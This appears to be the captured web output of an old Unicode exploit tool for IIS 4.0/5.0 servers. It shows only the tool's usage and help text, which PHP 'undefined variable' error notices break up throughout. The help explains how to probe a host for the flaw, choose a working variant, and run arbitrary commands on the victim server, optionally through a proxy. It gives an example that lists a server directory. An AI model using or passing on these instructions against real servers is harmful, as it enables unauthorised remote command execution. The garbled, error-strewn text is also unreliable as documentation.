-------------------------------------------------------------------- ------------- (c) UNICODE exploit for IIS 5.0/4.0 by BoloTron ------ -------------------------------------------------------------------- Usage of the wicked device:
Notice: Undefined variable: argv in /mnt/data/html/sentry/test.php on line 152

Notice: Trying to access array offset on value of type null in /mnt/data/html/sentry/test.php on line 152
-t www.victim.vic
Notice: Undefined variable: argv in /mnt/data/html/sentry/test.php on line 153

Notice: Trying to access array offset on value of type null in /mnt/data/html/sentry/test.php on line 153
-t www.victim.vic -p proxy:port
Notice: Undefined variable: argv in /mnt/data/html/sentry/test.php on line 154

Notice: Trying to access array offset on value of type null in /mnt/data/html/sentry/test.php on line 154
www.victim.vic comand variant_number
Notice: Undefined variable: argv in /mnt/data/html/sentry/test.php on line 155

Notice: Trying to access array offset on value of type null in /mnt/data/html/sentry/test.php on line 155
-p proxy:port www.victim.vic comand variant_number Options: -t --> Test the vulnerability (Try known variants till find the good one) -p --> Attack through proxy Use Mode: 1) Test the host and get the variants number in case vulnerability exists 2) Attack with command and variants number (optionaly you can use proxy) Note : When you specify a command with spaces, replace spaces with low script "_"
Notice: Undefined variable: argv in /mnt/data/html/sentry/test.php on line 167

Notice: Trying to access array offset on value of type null in /mnt/data/html/sentry/test.php on line 167
and you must double the backslash "\". Example -p proxy.prx:3128 www.victima.com dir_c:\\inetpub 49 Thanks to An-tonio for the proxy support. Bug discover by Anonymous Post.
Notice: Undefined variable: argv in /mnt/data/html/sentry/test.php on line 170

Notice: Trying to access array offset on value of type null in /mnt/data/html/sentry/test.php on line 170
TYPE spanish, for Spanish help.